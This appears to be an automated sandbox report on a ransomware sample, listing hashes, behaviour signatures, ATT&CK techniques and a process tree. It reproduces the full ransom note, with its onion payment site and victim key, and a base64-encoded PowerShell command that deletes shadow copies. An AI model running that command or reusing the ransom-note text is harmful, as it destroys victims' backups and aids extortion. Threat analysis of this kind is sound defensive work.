Analysis

  • max time kernel
    148s
  • max time network
    170s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:07

General

  • Target

    c4e4ba1df696daaaa6675d93199a1a94e6cc7729fe44042fe24713e2f6ce7c9d.exe

  • Size

    116KB

  • MD5

    f4584aed97469c461826ea17ca9b3c1d

  • SHA1

    083d35fbe692805d4ca1292debde192291b1b72f

  • SHA256

    c4e4ba1df696daaaa6675d93199a1a94e6cc7729fe44042fe24713e2f6ce7c9d

  • SHA512

    8137522cbf8f8010fe70798bd668054bbed56565d6568bdbdc79d633d278e34b008a966eeed0d39f049989c6e08521de55483a35fd8fd3d99d84e438a5f56dc9

Score
10/10

Malware Config

Extracted

Path

C:\61p01-readme.txt

Family

ryuk

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 61p01. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. I suggest you read about us on the Internet, we are known as "Sodinokibi Ransomware". For example, this article: https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread Pay attention to that: "How Much Data Is Decrypted with a Ransomware Decryptor? In Q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. This statistic varied dramatically depending on the ransomware type. For example, Ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while Sodinokibi was close to 100%. " Now you have a guarantee that your files will be returned 100 %. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DD2229C7D5FBA915 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/DD2229C7D5FBA915 Warning: secondary website can be blocked, thats why first variant much better and more available. If you have problem with connect, use strictly TOR version 8.5.5 link for download TOR version 8.5.5 here: https://filehippo.com/download_tor_browser_for_windows/ When you open our website, put the following data in the input form: Key: y9LnvHjFJ3vTmw8Y3G4u7494eVVQwY8ToSHnbVne/skHjER9mnlu4lzfcrXxZnI0 MHCnOCVzvUJBAzE3JjpEDunwQZCmSjX6ft3pFHwC/LkDCNw4jcM3LMJd4PIyvsjI hffN4ty3xgNW/SXyOZ0EqRMhDdjgOV1ZsAmue5XN2wixnUqxOie9q1NGbGy/439N ce1/Ajtz1txc1opt39L3h35geXKLkki3cogTXqWxPuQjEKL7GTNQTzJyRMUcjFx4 BsqHnFEa3O2uUK6onHG0ePMAYxEKPzVRXPvAcco3W0BqksZ/ExEDJHxzSlJvRWKn /h3jBNJRImRb3QON0NQjsxqu4q/ZMnCtFcjqBQejlU9sQy0ITN1KJffUDzKkfGhL YBE7uJwQhlMTRFpcYYIS+DkbfQQPFg1TQyUF6Y/Y49LHlMoLh/xJkaiQZ80xwm9z F09//N3HNBhbAlIOCaPmYQZsKOpDfJnx2kB5LRFb/gSZEcNav8yxEkTwIJe4lFUx 8pi9Uc+d9bZHCZOc27d6Wom45AaJt5IK/aC5fKTaGbKT3Q2dTp8Z3PnK0VifElq7 +M18wutBtVwcagt3InKHIIJmZ2dH+Kn7GArIxwp1ea+0l0b63j0f/A7Og3m6OQQG iTl1FZCfK779x99eSB2Debz/Ku00AcSLw3Zv39Wf7fOKZRbKvTcCPKbOfRS23Xv7 yLRW/ZWVDjsIyxan12xe6my5iSyLcIgCRkIwch401eRnGibn7c3/07IB5rMxt25X 2MaUIgWUbx6qkuLACXvQskA2YWHA9kHqsXRkOdpUUZZXXjjUjZnRSg7iASkN17iY RN8xaxWUuyLTByZDr0B3cGfVN4pYoW3LuO4WH82y+GjJTQl1QQgr837rlqGBLOgg LC86wzmo/80vL8Quowshqrr/ieK1KFmrv2+iDyumhbcy3bCrDMSEJVI/RhlXABfH CxxIfHh2FuqIgGjPu2sv1JqzoUVuehy2Q7mqnwd5V/u7/XdZ1inmwAju2x7sp+1i eEY5LareEQwTnV3q6bSFd9uL6ovbEdbmoXy/dg7LPbHNDXQZ2TOn8ihb8WVT+qmW q+c4P3Q4D4b3DICXcIkjEWZ/c3BmWsdXaD6jSvUJhlMsPkiXnhP4OCofdivkFDKV He0yFRhSNjdgaXO+5Tq7lzLuBvOkPQKSGJ9/eKDae+IrJbZQTdsgFI+I6hbd1JGP fLXfHB/qZ8M8dUhxeWs5JK0IqDtfOP6Y6JWsQZAKvzWjp+RNBHNswXCu7XU/TqfU ZBXb3NR0eJovahg91GTDnIvFWdC+2g== Extension name: 61p01 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DD2229C7D5FBA915

http://decryptor.cc/DD2229C7D5FBA915

https://filehippo.com/download_tor_browser_for_windows/

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 25 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c4e4ba1df696daaaa6675d93199a1a94e6cc7729fe44042fe24713e2f6ce7c9d.exe
    "C:\Users\Admin\AppData\Local\Temp\c4e4ba1df696daaaa6675d93199a1a94e6cc7729fe44042fe24713e2f6ce7c9d.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:776
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1108
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2040

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/776-56-0x000007FEFC241000-0x000007FEFC243000-memory.dmp
      Filesize

      8KB

    • memory/776-57-0x00000000024A0000-0x00000000024A2000-memory.dmp
      Filesize

      8KB

    • memory/776-59-0x00000000024A2000-0x00000000024A4000-memory.dmp
      Filesize

      8KB

    • memory/776-60-0x00000000024A4000-0x00000000024A7000-memory.dmp
      Filesize

      12KB

    • memory/776-58-0x000007FEF34A0000-0x000007FEF3FFD000-memory.dmp
      Filesize

      11.4MB

    • memory/776-61-0x00000000024AB000-0x00000000024CA000-memory.dmp
      Filesize

      124KB

    • memory/1648-55-0x00000000763B1000-0x00000000763B3000-memory.dmp
      Filesize

      8KB